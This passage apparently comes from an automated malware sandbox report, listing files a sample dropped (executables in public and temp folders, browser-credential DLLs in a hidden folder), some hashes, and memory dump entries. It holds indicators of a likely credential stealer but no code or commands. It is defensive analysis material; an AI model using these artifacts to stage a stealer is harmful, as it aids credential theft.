          Download Submit

        • C:\Users\Admin\AppData\Local\Temp\zVhjgfutyFD.exe
          Download Submit

        • C:\Users\Public\gxd.exe
          Download Submit

        • C:\Users\Public\gxd.exe
          Download Submit

        • C:\Users\Public\gxd.exe
          Download Submit

        • C:\Users\Public\xbu.exe
          Download Submit

        • C:\Users\Public\xbu.exe
          Download Submit

        • C:\Users\Public\xpj.exe
          Download Submit

        • C:\Users\Public\xpj.exe
          Download Submit

        • C:\Windows\temp\i0goxk4y.inf
          Download Submit

        • \ProgramData\mozglue.dll
          Download Submit

        • \ProgramData\nss3.dll
          MD5

          bfac4e3c5908856ba17d41edcd455a51

          SHA1

          8eec7e888767aa9e4cca8ff246eb2aacb9170428

          SHA256

          e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

          SHA512

          2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

          Download Submit

        • \ProgramData\sqlite3.dll
          Download Submit

        • \Users\Admin\AppData\LocalLow\nb98wqnehe8bw89hb\freebl3.dll
          Download Submit

        • \Users\Admin\AppData\LocalLow\nb98wqnehe8bw89hb\freebl3.dll
          Download Submit

        • \Users\Admin\AppData\LocalLow\nb98wqnehe8bw89hb\freebl3.dll
          Download Submit

        • \Users\Admin\AppData\LocalLow\nb98wqnehe8bw89hb\mozglue.dll
          Download Submit

        • \Users\Admin\AppData\LocalLow\nb98wqnehe8bw89hb\nss3.dll
          MD5

          02cc7b8ee30056d5912de54f1bdfc219

          SHA1

          a6923da95705fb81e368ae48f93d28522ef552fb

          SHA256

          1989526553fd1e1e49b0fea8036822ca062d3d39c4cab4a37846173d0f1753d5

          SHA512

          0d5dfcf4fb19b27246fa799e339d67cd1b494427783f379267fb2d10d615ffb734711bab2c515062c078f990a44a36f2d15859b1dacd4143dcc35b5c0cee0ef5

          Download Submit

        • \Users\Admin\AppData\LocalLow\nb98wqnehe8bw89hb\softokn3.dll
          Download Submit

        • \Users\Admin\AppData\LocalLow\nb98wqnehe8bw89hb\softokn3.dll
          Download Submit

        • \Users\Admin\AppData\LocalLow\sqlite3.dll
          Download Submit

        • memory/208-9-0x0000000000000000-mapping.dmp

          Download

        • memory/504-84-0x0000000007CC0000-0x0000000007CC1000-memory.dmp

          Filesize

          4KB

          Download

        • memory/504-33-0x0000000070F40000-0x000000007162E000-memory.dmp

          Filesize

          6.9MB

          Download

        • memory/504-24-0x0000000000000000-mapping.dmp

          Download

        • memory/632-13-0x0000000000000000-mapping.dmp

          Download

        • memory/684-272-0x0000000007510000-0x0000000007511000-memory.dmp

          Filesize

          4KB

          Download

        • memory/684-262-0x0000000000000000-mapping.dmp

          Download

        • memory/684-265-0x0000000070F40000-0x000000007162E000-memory.dmp

          Filesize

          6.9MB

          Download

        • memory/732-220-0x0000000070F40000-0x000000007162E000-memory.dmp

          Filesize

          6.9MB

          Download

        • memory/732-214-0x0000000000000000-mapping.dmp

          Download

        • memory/732-223-0x0000000000120000-0x0000000000121000-memory.dmp

          Filesize

          4KB

          Download

        • memory/732-246-0x0000000007960000-0x0000000007998000-memory.dmp

          Filesize

          224KB

          Download

        • memory/1244-15-0x0000000000000000-mapping.dmp

          Download

        • memory/1492-35-0x0000000070F40000-0x000000007162E000-memory.dmp

          Filesize

          6.9MB

          Download

        • memory/1492-66-0x0000000008290000-0x0000000008291000-memory.dmp

          Filesize

          4KB

          Download

        • memory/1492-36-0x0000000004F60000-0x0000000004F61000-memory.dmp

          Filesize

          4KB

          Download

        • memory/1492-97-0x00000000097A0000-0x00000000097A1000-memory.dmp

          Filesize

          4KB

          Download

        • memory/1492-60-0x0000000008130000-0x0000000008131000-memory.dmp

          Filesize

          4KB

          Download

        • memory/1492-28-0x0000000000000000-mapping.dmp

          Download

        • memory/1520-16-0x0000000000000000-mapping.dmp

          Download

        • memory/1952-72-0x0000000006960000-0x0000000006961000-memory.dmp

          Filesize

          4KB

          Download

        • memory/1952-29-0x0000000000000000-mapping.dmp

          Download

        • memory/1952-30-0x0000000070F40000-0x000000007162E000-memory.dmp

          Filesize

          6.9MB

          Download

        • memory/1952-54-0x0000000006C80000-0x0000000006C81000-memory.dmp

          Filesize

          4KB

          Download

        • memory/1996-48-0x0000000007510000-0x0000000007511000-memory.dmp

          Filesize

          4KB

          Download

        • memory/1996-102-0x0000000009AC0000-0x0000000009AC1000-memory.dmp

          Filesize

          4KB

          Download

        • memory/1996-32-0x0000000070F40000-0x000000007162E000-memory.dmp

          Filesize

          6.9MB

          Download

        • memory/1996-27-0x0000000000000000-mapping.dmp

          Download

        • memory/2112-244-0x0000000000400000-0x000000000040C000-memory.dmp

          Filesize

          48KB

          Download

        • memory/2112-245-0x000000000040616E-mapping.dmp

          Download

        • memory/2112-249-0x0000000070F40000-0x000000007162E000-memory.dmp

          Filesize

          6.9MB

          Download

        • memory/2176-10-0x0000000000000000-mapping.dmp

          Download

        • memory/2304-23-0x0000000000000000-mapping.dmp

          Download

        • memory/2324-253-0x0000000000403BEE-mapping.dmp

          Download

        • memory/2324-252-0x0000000000400000-0x0000000000408000-memory.dmp

          Filesize

          32KB

          Download

        • memory/2324-257-0x0000000070F40000-0x000000007162E000-memory.dmp

          Filesize

          6.9MB

          Download

        • memory/2440-7-0x0000000000000000-mapping.dmp

          Download

        • memory/2920-234-0x000000000040C76E-mapping.dmp

          Download

        • memory/2920-233-0x0000000000400000-0x0000000000412000-memory.dmp

          Filesize

          72KB

          Download

        • memory/2920-237-0x0000000070F40000-0x000000007162E000-memory.dmp

          Filesize

          6.9MB

          Download

        • memory/3160-0-0x0000000000000000-mapping.dmp

          Download

        • memory/3164-215-0x0000000000000000-mapping.dmp

          Download

        • memory/3172-108-0x000000000A050000-0x000000000A051000-memory.dmp

          Filesize

          4KB

          Download

        • memory/3172-105-0x0000000009200000-0x0000000009201000-memory.dmp

          Filesize

          4KB

          Download

        • memory/3172-79-0x0000000008140000-0x0000000008141000-memory.dmp

          Filesize

          4KB

          Download

        • memory/3172-34-0x0000000070F40000-0x000000007162E000-memory.dmp

          Filesize

          6.9MB

          Download

        • memory/3172-42-0x0000000006F80000-0x0000000006F81000-memory.dmp

          Filesize

          4KB

          Download

        • memory/3172-26-0x0000000000000000-mapping.dmp

          Download

        • memory/3460-21-0x0000000000000000-mapping.dmp

          Download

        • memory/3800-258-0x0000000000000000-mapping.dmp

          Download

        • memory/3800-263-0x0000000004650000-0x0000000004751000-memory.dmp

          Filesize

          1.0MB

          Download

        • memory/3848-2-0x0000000000000000-mapping.dmp

          Download

        • memory/3848-3-0x0000000000000000-mapping.dmp

          Download

        • memory/3980-216-0x00000000004C0000-0x00000000004C1000-memory.dmp

          Filesize

          4KB

          Download

        • memory/3980-210-0x0000000000000000-mapping.dmp

          Download

        • memory/3980-213-0x0000000070F40000-0x000000007162E000-memory.dmp

          Filesize

          6.9MB

          Download

        • memory/3980-240-0x0000000006810000-0x0000000006841000-memory.dmp

          Filesize

          196KB

          Download

        • memory/4056-25-0x0000000000000000-mapping.dmp

          Download

        • memory/4056-90-0x00000000096F0000-0x00000000096F1000-memory.dmp

          Filesize

          4KB

          Download

        • memory/4056-31-0x0000000070F40000-0x000000007162E000-memory.dmp

          Filesize

          6.9MB

          Download

        • memory/4248-229-0x0000000000000000-mapping.dmp

          Download

        • memory/4256-148-0x0000000000000000-mapping.dmp

          Download

        • memory/4428-275-0x0000000000000000-mapping.dmp

          Download

        • memory/4460-149-0x0000000000000000-mapping.dmp

          Download

        • memory/4492-151-0x0000000000000000-mapping.dmp

          Download

        • memory/4576-163-0x0000000000400000-0x0000000000497000-memory.dmp

          Filesize

          604KB

          Download

        • memory/4576-157-0x0000000000400000-0x0000000000497000-memory.dmp

          Filesize

          604KB

          Download

        • memory/4576-159-0x000000000043FA56-mapping.dmp

          Download

        • memory/4672-201-0x0000000000000000-mapping.dmp

          Download

        • memory/4672-230-0x00000000029D0000-0x0000000002A0C000-memory.dmp

          Filesize

          240KB

          Download

        • memory/4672-231-0x00000000050A0000-0x00000000050B6000-memory.dmp

          Filesize

          88KB

          Download

        • memory/4672-205-0x00000000007D0000-0x00000000007D1000-memory.dmp

          Filesize

          4KB

          Download

        • memory/4672-204-0x0000000070F40000-0x000000007162E000-memory.dmp

          Filesize

          6.9MB

          Download

        • memory/4704-172-0x0000000000400000-0x0000000000438000-memory.dmp

          Filesize

          224KB

          Download

        • memory/4704-167-0x0000000000400000-0x0000000000438000-memory.dmp

          Filesize

          224KB

          Download

        • memory/4704-168-0x0000000000417A8B-mapping.dmp

          Download

        • memory/4760-176-0x000000000041A684-mapping.dmp

          Download

        • memory/4792-170-0x0000000000400000-0x0000000000424000-memory.dmp

          Filesize

          144KB

          Download

        • memory/4792-174-0x0000000000400000-0x0000000000424000-memory.dmp

          Filesize

          144KB

          Download

        • memory/4792-171-0x000000000041A684-mapping.dmp

          Download

        • memory/4892-198-0x0000000000000000-mapping.dmp

          Download

        • memory/4916-207-0x0000000000000000-mapping.dmp

          Download

        • memory/4928-200-0x0000000000000000-mapping.dmp

          Download

        • memory/5052-154-0x000000000D290000-0x000000000D291000-memory.dmp

          Filesize

          4KB

          Download

        • memory/5052-144-0x000000000AA00000-0x000000000AA01000-memory.dmp

          Filesize

          4KB

          Download

        • memory/5052-142-0x0000000002EB0000-0x0000000002F78000-memory.dmp

          Filesize

          800KB

          Download

        • memory/5052-137-0x0000000000B30000-0x0000000000B31000-memory.dmp

          Filesize

          4KB

          Download

        • memory/5052-126-0x0000000070F40000-0x000000007162E000-memory.dmp

          Filesize

          6.9MB

          Download

        • memory/5052-120-0x0000000000000000-mapping.dmp

          Download

        • memory/5052-145-0x0000000005620000-0x0000000005621000-memory.dmp

          Filesize

          4KB

          Download

        • memory/5052-166-0x000000000CE20000-0x000000000CE34000-memory.dmp

          Filesize

          80KB

          Download

        • memory/5060-121-0x0000000000000000-mapping.dmp

          Download

        • memory/5100-127-0x0000000000000000-mapping.dmp

          Download